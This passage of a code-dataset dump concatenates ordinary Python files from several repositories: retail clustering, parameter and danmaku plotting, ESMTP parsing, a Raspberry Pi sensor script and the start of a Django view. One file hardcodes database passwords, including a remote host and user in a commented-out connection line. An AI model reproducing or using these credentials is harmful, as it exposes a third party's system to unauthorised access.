value_mat1_list = []\r\n\r\n for key_transaction1 in dict_of_transactions[key1]:\r\n value_mat1_list.append(key_transaction1)\r\n receipt_matl_dict[key1] = value_mat1_list\r\n\r\n del value_mat1_list\r\n\r\n\r\n def find_cat_list(self, query,level, conn):\r\n\r\n cat_list = []\r\n cat = pd.read_sql(query, conn)\r\n\r\n for index, row in cat.iterrows():\r\n cat_list.append(row['level'+str(level)+'_value'])\r\n\r\n return cat_list\r\n\r\n\r\n\r\n def jaccard(self,val1, val2):\r\n return round(1 - (len(val1.intersection(val2)) / len(val1.union(val2))), 2)\r\n\r\n\r\n def create_dict_of_transactions(self,dict_of_transactions,price_list,no_of_products_list,gp):\r\n\r\n for name, group in gp:\r\n df = pd.DataFrame(data=group)\r\n\r\n setOfTransactions = {}\r\n\r\n materials = df['material'].values\r\n\r\n level7_value = df['level7_value'].values\r\n\r\n level6_value = df['level6_value'].values\r\n level5_value = df['level5_value'].values\r\n level4_value = df['level4_value'].values\r\n\r\n\r\n # filtering materils from leergut and tasche metl_grps\r\n for i in range(len(materials)):\r\n if materials[i] not in setOfTransactions.keys() and level7_value[i] not in ['714W0020', '850W0200', '850W9600','851W0100', '851W9600', '852W0100','852W0200', '852W9600']:\r\n setOfTransactions[materials[i]] = list([level7_value[i], level6_value[i], 
level5_value[i],level4_value[i]])\r\n\r\n # Storing receipte with minimum of 6 materials\r\n dict_of_transactions.update({name: setOfTransactions})\r\n\r\n price_list.append(df['rpa_tsa'].unique())\r\n no_of_products_list.append(df['total_number_of_products'].unique())\r\n\r\n\r\n\r\n def create_diagonal_distance_metric(self,cat_list,keys,dict_of_transactions,index,level):\r\n\r\n level_cat_vector_matrix = []\r\n\r\n for key in keys:\r\n level_cat_vector_matrix.append(self.create_distribution_vector(cat_list, key, dict_of_transactions,index))\r\n\r\n\r\n level_pair_distance = distance.pdist(level_cat_vector_matrix, metric='minkowski', p=1).astype('float16')\r\n\r\n del level_cat_vector_matrix\r\n\r\n with open('./diagonalDistanceMatrixCategory'+str(level)+'JAC_MINKOWSKI_70000.p', 'wb') as fp:\r\n pickle.dump(level_pair_distance, fp, protocol=4)\r\n\r\n\r\n def dist_metric(self,keys,dict_of_transactions,level):\r\n\r\n\r\n try:\r\n #conn = psycopg2.connect(dbname='checkout_data',user='bhavesh', host='geoserver.sb.dfki.de', password='LrVYI%TMT%d3')\r\n conn = psycopg2.connect(dbname='postgres',user='postgres', host='localhost', password='606902bB')\r\n except:\r\n print(\"I am unable to connect to the database\")\r\n '''\r\n data=pd.read_sql(\"select a.rpa_tnr,a.rpa_bdd,a.rpa_dep,a.plant,a.rpa_wid,a.rpa_tsa,a.rpa_trnov,a.rpa_lnecnt,a.rpa_bts,a.umsatzdatum,a.total_number_of_products,a.total_number_of_distinct_products,b.material,c.level7_value,c.level6_value,c.level5_value,c.level4_value from receipts a,receipt_articles b,category_core c where a.receipt_id=b.receipt_id and b.matl_group=c.level7_value and a.plant='1006' and rpa_dep in ('53','54')\",conn)\r\n\r\n #print(len(data))\r\n #print(data)\r\n #print(data['level6_value'])\r\n '''\r\n\r\n\r\n # Category level7\r\n\r\n if level==7:\r\n\r\n cat_list=self.find_cat_list(\"select distinct level7_value from category_core\",7,conn)\r\n index=0\r\n\r\n\r\n # Category level6\r\n elif level==6:\r\n\r\n cat_list = self.find_cat_list(\"select distinct level6_value from category_core\",6, conn)\r\n index = 1\r\n\r\n\r\n # Category level5\r\n\r\n elif level==5:\r\n cat_list = self.find_cat_list(\"select distinct level5_value from category_core\",5,conn)\r\n index=2\r\n\r\n\r\n # Category level4\r\n elif level==4:\r\n cat_list = self.find_cat_list(\"select distinct level4_value from category_core\",4, conn)\r\n index=3\r\n\r\n\r\n\r\n '''\r\n # Grouping data by transaction nr and booking date\r\n gp = data.groupby(by=['rpa_tnr', 'rpa_bdd','plant','rpa_dep','rpa_wid','rpa_tsa','rpa_trnov','rpa_lnecnt','rpa_bts','umsatzdatum','total_number_of_products','total_number_of_distinct_products'], sort=False, group_keys=False, squeeze=True)\r\n\r\n # Creating dictionary of transactions\r\n dict_of_transactions = dict()\r\n self.create_dict_of_transactions(dict_of_transactions,gp)\r\n '''\r\n '''\r\n\r\n # Storing details of receipts, can be used later for inspecting cluster quality\r\n with open('./transactionAsSetofMaterialsMtl_grpCat7654.p', 'wb') as fp:\r\n pickle.dump(dict_of_transactions, fp)\r\n '''\r\n\r\n\r\n\r\n\r\n '''\r\n number_groups = len(dict_of_transactions)\r\n print(number_groups)\r\n receipts_bdd = list(dict_of_transactions.keys())\r\n\r\n keys = random.sample(receipts_bdd, 70000)\r\n print(keys)\r\n\r\n del receipts_bdd\r\n del number_groups\r\n\r\n # Storing details of receipts, can be used later for inspecting cluster quality\r\n with open('./keys_70000.p', 'wb') as fp:\r\n pickle.dump(keys, fp)\r\n\r\n '''\r\n\r\n 
self.create_diagonal_distance_metric(cat_list,keys,dict_of_transactions,index,level)\r\n\r\n\r\n","repo_name":"BhaveshBhansali/Offline_Retail_Recommender_System","sub_path":"RecommenderSystem/Clustering/ClusterDistance.py","file_name":"ClusterDistance.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14147724807","text":"import os\nimport json\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mpl\nimport seaborn as sns\n\ndef plot_distribution(dataset_name):\n filepath = 'benchmarks/parameters/{}'.format(dataset_name)\n \n # Set style to colorblind\n sns.set(style='whitegrid', palette='colorblind')\n\n # Load log data per model\n # PyPHM: p_entailment, A_conf, I_conf, E_conf, O_conf\n # mReasoner: epsilon, lambda, omega, sigma\n # TransSet: nvc_aversion, anchor_set, particularity, negativity\n\n\n # Individual analysis\n params_transset_indiv = []\n params_mreasoner_indiv = []\n params_phm_indiv = []\n\n for fname in os.listdir(filepath):\n if not fname.endswith('.json'):\n continue\n \n with open(filepath + \"/\" + fname) as fh:\n agg_log = json.load(fh)\n condition = fname.split(\"_\")[1][:-5]\n\n # Extract TransSet\n for subj, data in agg_log['TransSet'].items():\n p_nvc_aversion = data['nvc_aversion']\n p_anchor_set = data['anchor_set']\n p_particularity = data['particularity']\n p_negativity = data['negativity']\n\n params_transset_indiv.append({\n 'model': 'TransSet',\n 'condition': condition,\n 'id': subj,\n 'nvc_aversion': p_nvc_aversion,\n 'anchor_set': p_anchor_set,\n 'particularity': p_particularity,\n 'negativity': p_negativity\n })\n \n # Extract mReasoner\n for subj, data in agg_log['mReasoner'].items():\n p_epsilon = data['epsilon']\n p_lambda = data['lambda']\n p_omega = data['omega']\n p_sigma = data['sigma']\n\n params_mreasoner_indiv.append({\n 'model': 'mReasoner',\n 'condition': condition,\n 'id': subj,\n 'epsilon': p_epsilon,\n 'lambda': p_lambda,\n 'omega': p_omega,\n 'sigma': p_sigma\n })\n \n # Extract PHM\n for subj, data in agg_log['PyPHM'].items():\n p_p_entailment = data['p_entailment']\n p_A_conf = data['A_conf']\n p_I_conf = data['I_conf']\n p_E_conf = data['E_conf']\n p_O_conf = data['O_conf']\n\n params_phm_indiv.append({\n 'model': 'PyPHM',\n 'condition': condition,\n 'id': subj,\n 'p_entailment': p_p_entailment,\n 'A_conf': p_A_conf,\n 'I_conf': p_I_conf,\n 'E_conf': p_E_conf,\n 'O_conf': p_O_conf\n })\n \n # Convert to dataframes\n df_params_transset_indiv = pd.DataFrame(params_transset_indiv)\n df_params_mreasoner_indiv = pd.DataFrame(params_mreasoner_indiv)\n df_params_phm_indiv = pd.DataFrame(params_phm_indiv)\n\n # Visualize distribution\n pnames_transset = ['nvc_aversion', 'anchor_set', 'particularity', 'negativity']\n pnames_mreasoner = ['epsilon', 'lambda', 'omega', 'sigma']\n greek_mreasoner = ['$\\epsilon$', '$\\lambda$', '$\\omega$', '$\\sigma$']\n pnames_phm = ['p_entailment', 'A_conf', 'I_conf', 'E_conf', 'O_conf']\n\n hue_order = ['control', 'feedback']\n plot_width = 8\n plot_height = 2\n\n # TransSet\n fig, axs = plt.subplots(1, 4, figsize=(plot_width, plot_height))\n\n for idx, pname in enumerate(pnames_transset):\n pdf = df_params_transset_indiv[['condition', pname]]\n \n plot_data = []\n for condition, condition_df in pdf.groupby('condition'):\n keys, cnts = np.unique(condition_df[pname], return_counts=True)\n cnts = cnts.astype('float')\n cnts /= cnts.sum()\n \n addendum = 
[{'condition': condition, 'label': x, 'value': y} for x, y in zip(keys, cnts)]\n plot_data.extend(addendum)\n \n df_plot = pd.DataFrame(plot_data)\n sns.barplot(x='label', y='value', hue='condition', data=df_plot, hue_order=hue_order, ax=axs[idx])\n \n axs[idx].get_legend().remove()\n axs[idx].set_xlabel(pname)\n axs[idx].set_ylim(0, 1)\n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_yticklabels([])\n else:\n axs[idx].set_ylabel('Proportion')\n\n fig.suptitle('TransSet')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n fig.savefig('{}_transset.pdf'.format(dataset_name))\n plt.show()\n\n # mReasoner\n fig, axs = plt.subplots(1, 4, figsize=(plot_width, plot_height))\n df_params_mreasoner_indiv = df_params_mreasoner_indiv[pnames_mreasoner + ['condition']]\n\n for idx, pname in enumerate(pnames_mreasoner):\n sns.kdeplot(x=pname, hue='condition', data=df_params_mreasoner_indiv, hue_order=hue_order, ax=axs[idx], legend=False, common_norm=False)\n \n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_xlabel(greek_mreasoner[idx])\n fig.suptitle('mReasoner')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n plt.savefig('{}_mreasoner.pdf'.format(dataset_name))\n plt.show()\n\n # PHM\n fig, axs = plt.subplots(1, 5, figsize=(plot_width, plot_height))\n\n for idx, pname in enumerate(pnames_phm):\n pdf = df_params_phm_indiv[['condition', pname]]\n \n plot_data = []\n for condition, condition_df in pdf.groupby('condition'):\n keys, cnts = np.unique(condition_df[pname], return_counts=True)\n cnts = cnts.astype('float')\n cnts /= cnts.sum()\n \n addendum = [{'condition': condition, 'label': x, 'value': y} for x, y in zip(keys, cnts)]\n plot_data.extend(addendum)\n \n df_plot = pd.DataFrame(plot_data)\n sns.barplot(x='label', y='value', hue='condition', data=df_plot, hue_order=hue_order, ax=axs[idx])\n \n axs[idx].get_legend().remove()\n axs[idx].set_xlabel(pname)\n axs[idx].set_ylim(0, 1)\n if idx > 0:\n axs[idx].set_ylabel('')\n axs[idx].set_yticklabels([])\n else:\n axs[idx].set_ylabel('Proportion')\n \n fig.suptitle('PHM')\n plt.tight_layout(rect=(0,-0.03,1,0.95))\n plt.savefig('{}_phm.pdf'.format(dataset_name))\n plt.show()\n \nplot_distribution(\"dames2020\")\nplot_distribution(\"brand2021\")","repo_name":"Shadownox/iccm-feedbackexplanation","sub_path":"analysis/plot_param_distribution.py","file_name":"plot_param_distribution.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28618644278","text":"import json\r\nfrom datetime import datetime,time\r\nimport matplotlib.pyplot as plot\r\n\r\ndef danmaku2datetimes(danmaku_dict):\r\n\tdanmaku_dict.sort(key=lambda i:i['row'])\r\n\tdanmaku2date_times = [[],[]]\r\n\tfor i in danmaku_dict:\r\n\t\tdate_time = datetime(i['submit_time']['year'],i['submit_time']['month'],i['submit_time']['day'],i['submit_time']['hour'])\r\n\t\tif date_time not in danmaku2date_times[0]:\r\n\t\t\tdanmaku2date_times[0].append(date_time)\r\n\t\t\tdanmaku2date_times[1].append(1)\r\n\t\telse:\r\n\t\t\tdanmaku2date_times[1][len(danmaku2date_times[1])-1] += 1\r\n\treturn danmaku2date_times\r\n\r\ndef danmaku2vidtimes(danmaku_dict, div):\r\n\tdanmaku_dict.sort(key=lambda i:i['appear_time']['min']*60+i['appear_time']['sec'])\r\n\tdanmaku2vid_times = [[],[]]\r\n\tfor i in danmaku_dict:\r\n\t\tvid_time = datetime(1,1,1,1,i['appear_time']['min'],i['appear_time']['sec']//div*div)\r\n\t\tif vid_time not in 
danmaku2vid_times[0]:\r\n\t\t\tdanmaku2vid_times[0].append(vid_time)\r\n\t\t\tdanmaku2vid_times[1].append(1)\r\n\t\telse:\r\n\t\t\tdanmaku2vid_times[1][len(danmaku2vid_times[1])-1] += 1\r\n\treturn danmaku2vid_times\r\n\r\ndef main():\r\n\tprint('Loading danmaku data...')\r\n\tdanmaku_dict = []\r\n\tfilename = 'av44625717_2019-02-25 to 2019-03-01'\r\n\twith open(filename+'.json','r',encoding='utf-8') as jfile:\r\n\t\tdanmaku_dict = json.load(jfile)\r\n\r\n\t# plot.subplot(1,2,1)\r\n\t# plot.plot(*danmaku2date_times)\r\n\t# plot.gcf().autofmt_xdate()\r\n\t# plot.subplot(1,2,2)\r\n\r\n\tprint('Plotting data...')\r\n\tdiv = 5 #每5秒的弹幕算在一起\r\n\tdanmaku2vid_times = danmaku2vidtimes(danmaku_dict, div)\r\n\tplot.plot(*danmaku2vid_times,'r-o')\r\n\tplot.xlim([datetime(1,1,1,1,0,0),datetime(1,1,1,1,12,30)]) #设置X轴范围\r\n\tplot.grid(True, linestyle='-.')\r\n\r\n\tdiv *= 3\r\n\tplot.xticks([datetime(1,1,1,1,i//60,i%60) for i in range(0,(12*60+30)+div,div)],\r\n\t\t[str(time(0,i//60,i%60))[3:] for i in range(0,(12*60+30)+div,div)],rotation=60) #划分X轴\r\n\t\r\n\tprint('Generating image...')\r\n\tfig = plot.gcf()\r\n\tfig.set_size_inches(18.5,10.5)#设置图片大小\r\n\tfig.savefig('plot.png')\r\n\tplot.show()\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"Antoxxx/DanmakuAnalysis","sub_path":"danmaku2time_graph.py","file_name":"danmaku2time_graph.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2484245183","text":"import sys\n\nfrom src.persistence import get_data_input, write_data_output\nfrom src.transforms import group_by_ikid, update_sector_column, add_daily_return_column\n\n\ndef main(csv_input_path: str, csv_output_path: str):\n dataframe = get_data_input(csv_input_path)\n transforms = [group_by_ikid, update_sector_column, add_daily_return_column]\n for transform in transforms:\n dataframe = transform(dataframe)\n write_data_output(dataframe, csv_output_path)\n\n\nif __name__ == \"__main__\":\n input_path, output_path = sys.argv[1], sys.argv[2]\n main(input_path, output_path)\n","repo_name":"wfq2/lk-processor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34621790928","text":"import os\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\n\npath_directory = '/home/mic/old-html/posts_notes_md'\npyfile_directory = '/home/mic/python/paste_pygments/python_config_files'\nfor filename in os.listdir(path_directory):\n print(os.path.join(path_directory, filename))\npyfile_directory = '/home/mic/python/paste_pygments/python_config_files'\npath = os.path.join(path_directory, filename)\ncode = \"\"\"---\ntitle: Python Debugger Trepan3k\ntags:\n- trepan3k\n- debug\n- debugger\n---\n\n To use the Trepan3k (python 3 version of Trepan2), we can,as an\n example, construct the following command line expression:\n ----------------------------------------------------------------\n trepan3k --highlight=light -o file_to_debugged.py\n ----------------------------------------------------------------\n The flag '--highlight', colorizes the output. It can be light or\n dark.\n The flag '-o' defines to what file will go the output of the\n debugging. 
BEWARE, if you choose this, you won't see the output\n    when running it from the terminal.\n    https://python2-trepan.readthedocs.io\n\"\"\"\npyfile = pyfile_directory + '/' + filename[:-3] + '.py'\nlexer = get_lexer_by_name('python', stripall=True)\nformatter = HtmlFormatter(linenos=True, full=True, style='zenburn')\nf = open(pyfile[:-3] + '.html', 'w')\nhighlight(code, lexer, formatter, outfile=f)\n","repo_name":"miccaldas/old_alternative_projects","sub_path":"paste_pygments/python_config_files/trepan.py","file_name":"trepan.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13439227222","text":"\n# f2 = open('data1','w')\n# f3 = f2.write('Time and tide is waits for none')\n# print(f3)\n# f2.close()\n\n\n# a\t\tOpen a file in the append mode and add new content at the end of the file.\nf2 = open('data1','a')\nf3 = f2.write('\\nall glitters are not gold')\nprint(f3)\nf2.close()\n\n\n\n\n\n","repo_name":"Mani015/Python_Aug","sub_path":"Python_Notes/Day54(File Handling)/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23550633340","text":"#光线传感器\nimport RPi.GPIO as GPIO\nimport time\n\nPin = 26 # GPIO Pin 26\n\nGPIO.setmode(GPIO.BCM)\ntime.sleep(1)\n# Setup light sensor pin status\nGPIO.setup(Pin, GPIO.OUT)\nGPIO.output(Pin, GPIO.LOW)\ntime.sleep(0.5)\nGPIO.output(Pin, GPIO.HIGH)\nGPIO.setup(Pin, GPIO.IN)\n\ntry:\n    print(\"LDR Online\")\n    i = 0\n    while True:\n        v = GPIO.input(Pin)\n        print(v)\n        if v == GPIO.LOW:\n            i = i + 1\n            print(\"LOW\")\n        if v == GPIO.HIGH:\n            print(\"HIGH\")\n        time.sleep(2)\n\nexcept (KeyboardInterrupt, SystemExit):\n    GPIO.cleanup()\n    print(\"LDR Offline\")\n    pass\n","repo_name":"corcd/Pi_Sensor","sub_path":"core/Pi_LDR.py","file_name":"Pi_LDR.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24031796241","text":"# Converts a directory tree of sublime-snippet files to a single JSON snippets file for Atom\nimport os, untangle, json\n\ndata = {}\ndata['.source.papyrus.fallout4'] = {}\n\nfor root, dirs, files in os.walk('.'):\n\tfor f in files:\n\t\tif f.endswith('.sublime-snippet'):\n\t\t\tfilePath = os.path.join(root, f)\n\t\t\tprint('Parsing ' + filePath)\n\t\t\txml = untangle.parse(filePath)\n\t\t\tsnippetName = xml.snippet.description.cdata\n\t\t\tif '.' not in snippetName: snippetName += '.' 
+ xml.snippet.tabTrigger.cdata\n\t\t\tsnippet = data['.source.papyrus.fallout4'][snippetName] = {}\n\t\t\tsnippet['prefix'] = xml.snippet.tabTrigger.cdata\n\t\t\tsnippet['body'] = xml.snippet.content.cdata.replace(' ', '\\t')\n\njson.dump(data, open('snippets.json', 'w'), indent='\\t')\n","repo_name":"Gawdl3y/atom-language-papyrus","sub_path":"BuildJSONSnippetFile.py","file_name":"BuildJSONSnippetFile.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"73343921367","text":"\ndef get_context_layoutlm(document, dpi_norm):\n context = []\n for page in document:\n for token in page[\"tokens\"]:\n pos = token[\"position\"]\n offset = token[\"doc_offset\"]\n width = page[\"pages\"][0][\"size\"][\"width\"]\n height = page[\"pages\"][0][\"size\"][\"height\"]\n context.append(\n {\n \"top\": int(pos[\"top\"] / height * 1000),\n \"bottom\": int(pos[\"bottom\"] / height * 1000),\n \"left\": int(pos[\"left\"] / width * 1000),\n \"right\": int(pos[\"right\"] / width * 1000),\n \"start\": offset[\"start\"],\n \"end\": offset[\"end\"],\n \"text\": token[\"text\"],\n }\n )\n return context\n\n\ndef get_context_doc_rep(document, dpi_norm):\n context = []\n for page in document:\n # This norm factor is\n if dpi_norm:\n dpi = page[\"pages\"][0][\"dpi\"]\n x_norm = 300 / dpi[\"dpix\"]\n y_norm = 300 / dpi[\"dpiy\"]\n else:\n x_norm = 1.0\n y_norm = 1.0\n\n for token in page[\"tokens\"]:\n pos = token[\"position\"]\n offset = token[\"doc_offset\"]\n context.append(\n {\n \"top\": pos[\"top\"] * y_norm,\n \"bottom\": pos[\"bottom\"] * y_norm,\n \"left\": pos[\"left\"] * x_norm,\n \"right\": pos[\"right\"] * x_norm,\n \"start\": offset[\"start\"],\n \"end\": offset[\"end\"],\n \"text\": token[\"text\"],\n }\n )\n return context\n","repo_name":"IndicoDataSolutions/finetune","sub_path":"finetune/util/context_utils.py","file_name":"context_utils.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":692,"dataset":"github-code","pt":"31"} +{"seq_id":"31767281375","text":"\"\"\"\nESMTP utils\n\"\"\"\nimport re\nfrom typing import Dict, List, Tuple\n\n\n__all__ = (\"parse_esmtp_extensions\",)\n\n\nOLDSTYLE_AUTH_REGEX = re.compile(r\"auth=(?P.*)\", flags=re.I)\nEXTENSIONS_REGEX = re.compile(r\"(?P[A-Za-z0-9][A-Za-z0-9\\-]*) ?\")\n\n\ndef parse_esmtp_extensions(message: str) -> Tuple[Dict[str, str], List[str]]:\n \"\"\"\n Parse an EHLO response from the server into a dict of {extension: params}\n and a list of auth method names.\n\n It might look something like:\n\n 220 size.does.matter.af.MIL (More ESMTP than Crappysoft!)\n EHLO heaven.af.mil\n 250-size.does.matter.af.MIL offers FIFTEEN extensions:\n 250-8BITMIME\n 250-PIPELINING\n 250-DSN\n 250-ENHANCEDSTATUSCODES\n 250-EXPN\n 250-HELP\n 250-SAML\n 250-SEND\n 250-SOML\n 250-TURN\n 250-XADR\n 250-XSTA\n 250-ETRN\n 250-XGEN\n 250 SIZE 51200000\n \"\"\"\n esmtp_extensions = {}\n auth_types: List[str] = []\n\n response_lines = message.split(\"\\n\")\n\n # ignore the first line\n for line in response_lines[1:]:\n # To be able to communicate with as many SMTP servers as possible,\n # we have to take the old-style auth advertisement into account,\n # because:\n # 1) Else our SMTP feature parser gets confused.\n # 2) There are some servers that only advertise the auth methods we\n # support using the old style.\n auth_match = OLDSTYLE_AUTH_REGEX.match(line)\n if auth_match is not None:\n auth_type = 
auth_match.group(\"auth\")\n auth_types.append(auth_type.lower().strip())\n\n # RFC 1869 requires a space between ehlo keyword and parameters.\n # It's actually stricter, in that only spaces are allowed between\n # parameters, but were not going to check for that here. Note\n # that the space isn't present if there are no parameters.\n extensions = EXTENSIONS_REGEX.match(line)\n if extensions is not None:\n extension = extensions.group(\"ext\").lower()\n params = extensions.string[extensions.end(\"ext\") :].strip()\n esmtp_extensions[extension] = params\n\n if extension == \"auth\":\n auth_types.extend([param.strip().lower() for param in params.split()])\n\n return esmtp_extensions, auth_types\n","repo_name":"cole/aiosmtplib","sub_path":"aiosmtplib/esmtp.py","file_name":"esmtp.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"31"} +{"seq_id":"43321592475","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 5 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom scipy.stats import t\r\nfrom scipy.stats import norm\r\nfrom matplotlib import cm # Colormaps\r\n\r\nx = np.linspace(start = -5, stop = 5, num = 200)\r\n\r\n# plot PDF curves\r\n\r\nfig, ax = plt.subplots()\r\n\r\nDFs = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 25, 30]\r\n\r\ncolors = plt.cm.RdYlBu_r(np.linspace(0,1,len(DFs)))\r\n\r\nfor i in range(0,len(DFs)):\r\n df = DFs[i]\r\n plt.plot(x, t.pdf(x, df = df, loc = 0, scale = 1), \r\n color = colors[int(i)],\r\n label = \"\\u03BD = \" + str(df))\r\n\r\nax.axvline(x = 0, color = 'k', linestyle = '--')\r\n# compare with normal\r\nplt.plot(x,norm.pdf(x,loc = 0, scale = 1), color = 'k', label = 'Normal')\r\nplt.ylim((0, 0.5))\r\nplt.xlim((-5,5))\r\nplt.title(\"PDF of student's t\")\r\nplt.ylabel(\"PDF\")\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n# plot CDF curves\r\nfig, ax = plt.subplots()\r\n\r\nfor i in range(0,len(DFs)):\r\n df = DFs[i]\r\n plt.plot(x, t.cdf(x, df = df, loc = 0, scale = 1), \r\n color = colors[int(i)],\r\n label = \"\\u03BD = \" + str(df))\r\n\r\nax.axvline(x = 0, color = 'k', linestyle = '--')\r\nax.axhline(y = 0.5, color = 'k', linestyle = '--')\r\n\r\n# compare with normal\r\nplt.plot(x,norm.cdf(x,loc = 0, scale = 1), color = 'k', label = 'Normal')\r\nplt.ylim((0, 1))\r\nplt.xlim((-5,5))\r\nplt.title(\"CDF of student's t\")\r\nplt.ylabel(\"CDF\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book5_Essentials-of-Probability-and-Statistics","sub_path":"Book5_Ch07_Python_Codes/Bk5_Ch07_04.py","file_name":"Bk5_Ch07_04.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1797,"dataset":"github-code","pt":"31"} +{"seq_id":"19244335996","text":"from django.http import HttpResponse, HttpResponseRedirect, HttpResponsePermanentRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom time import strptime, strftime\nfrom classes.models import *\nfrom GChartWrapper import *\nimport numpy\n\ndef home(request):\n\tif request.method == 'POST':\n\t\tif 'class' in request.POST:\n\t\t\ttry:\n\t\t\t\tclasszy_key = request.POST['class'].lower().replace(' ','')\n\t\t\t\tclasszy = 
Class.objects.get(key=classzy_key)\t\n\t\t\t\tclasszy.views += 1\n\t\t\t\tclasszy.save()\n\t\t\t\tassignments = classzy.assignments.all()\n\t\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5]}, context_instance=RequestContext(request))\n\t\t\texcept:\n\t\t\t\treturn render_to_response('index.html', {'warning' : \"Sorry, class code not found\", 'error_class' : request.POST['class'] }, context_instance=RequestContext(request))\n\t\t\t\t\n\t\telif 'class_code' in request.POST:\n\t\t\tif request.POST['class_code'] == \"\":\n\t\t\t\treturn render_to_response('index.html', {'adding_warning' : \"Class Code cannot be empty\" }, context_instance=RequestContext(request))\n\t\t\ttry:\n\t\t\t\tclasszy_key = request.POST['class_code'].lower().replace(' ','')\n\t\t\t\tclasszy = Class.objects.get(key=classzy_key)\n\t\t\t\treturn render_to_response('index.html', {'adding_warning' : \"That class is already in Classzy!\" }, context_instance=RequestContext(request))\n\t\t\texcept:\n\t\t\t\tclasszy_key = request.POST['class_code'].lower().replace(' ','')\n\t\t\t\tclasszy = Class(key=classzy_key, code=request.POST['class_code'].upper())\n\t\t\t\tclasszy.views += 1\n\t\t\t\tclasszy.save()\n\t\t\t\tassignments = classzy.assignments.all()\n\t\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5]}, context_instance=RequestContext(request))\n\t\t\t\t\n\t\telif 'edit_class_code' in request.POST:\n\t\t\tclasszy = Class.objects.get(code=request.POST['edit_class_code'])\n\t\t\tclasszy.name = request.POST['edit_class_name']\n\t\t\tclasszy.professor = request.POST['edit_class_professor']\n\t\t\tclasszy.save()\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5], 'updated': True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'delete_class_code' in request.POST:\n\t\t\tclasszy = Class.objects.get(code=request.POST['delete_class_code'])\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\tdelete = Delete_Queue(title=\"Someone asked to delete \" + classzy.code)\n\t\t\tdelete.save()\n\t\t\tclasszy.delete = True\n\t\t\tclasszy.delete_queue = delete\n\t\t\tclasszy.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Deletion notice has been sent to admins.\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_classzy' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['add_assignment_classzy'])\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tif 'add_assignment_name' in request.POST and request.POST['add_assignment_name'] != \"\":\n\t\t\t\ttry:\n\t\t\t\t\tassignment = Assignment(name=request.POST['add_assignment_name'])\n\t\t\t\t\tassignment.classzy = classzy\n\t\t\t\t\tif request.POST['add_assignment_type'] == \"homework\":\n\t\t\t\t\t\tassignment.homework = True\t\t\n\t\t\t\t\tif 
